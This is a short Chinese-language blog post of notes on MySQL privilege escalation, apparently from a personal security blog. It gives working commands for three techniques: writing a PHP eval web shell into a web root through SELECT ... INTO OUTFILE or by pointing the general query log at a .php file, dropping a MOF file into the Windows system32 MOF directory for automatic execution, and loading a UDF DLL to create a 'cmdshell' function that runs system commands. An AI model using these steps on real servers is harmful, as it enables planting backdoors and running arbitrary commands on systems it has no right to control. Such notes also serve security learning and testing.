mysql提权笔记

0x01 phpnyadmin一句话提权

利用条件:

  • 查询:SHOW VARIABLES LIKE “secure_file_priv”,为null

  • select'<?php @eval($_POST[td]);?>'INTO OUTFILE 'C:\\phpStudy\\PHPTutorial\\WWW\\door.php'

使用日志文件:

set global general_log = "ON";

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/door.php';

select '<?php eval($_POST[td]);?>';


0x02 mof提权

利用条件

  • windows<=2003

  • 可写入c:/windows/system32/mof目录 ,此文件会自动执行

select load_file('C:/wmpub/nullevt.mof') into dumpfile
'c:/windows/system32/wbem/mof/nullevt.mof’


0x03 udf提权操作

利用条件

  • 账号具有对Mysql的insert和delete权限

利用过程

  1. 获取相应权限后上传udf.php

  2. 访问udf.php进行连接(需要能够远程连接)

  3. D:\xampp\mysql\lib\plugin\udf.dll
    链接成功后导出DLL文件(注意目录)
    mysql<5.0,导出路径随意;
    5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32)
    mysql>5.1,需要导出到mysql的插件目录
    查看插件目录:show variables like ‘%plugin%’;

  4. 创建自定义函数:Create Function cmdshell returns string soname ‘udf.dll’

    已经存在:drop function cmdshell;

  5. 执行函数:select cmdshell(‘ipconfig’)


  转载请注明: 星晴 mysql提权笔记

 上一篇
ctf解题思路笔记 ctf解题思路笔记
CTF解题思路 0x01 越来越难 sql注入-》ssrf 栈利用-》堆利用 古典密码 -》 区块链 容易入门,难以精通ctf-wiki:社区,新手友好 大量WP,大量OJ 难以提升,需要大量的精力 今年:硬核 内核提权,虚拟机逃逸,浏览
2019-10-13 starjian
下一篇 
ssrf-ctf ssrf-ctf
SSRF漏洞 # 0x01 ssrf存在的地方 图片的加载和下载:通过url地址加载或者下载图片 从远程服务器请求资源 数据库内置功能(oracle,MongoDB,MSSQL,Postgres,CouchDB) webMail收取其他邮
2019-07-17 starjian
  目录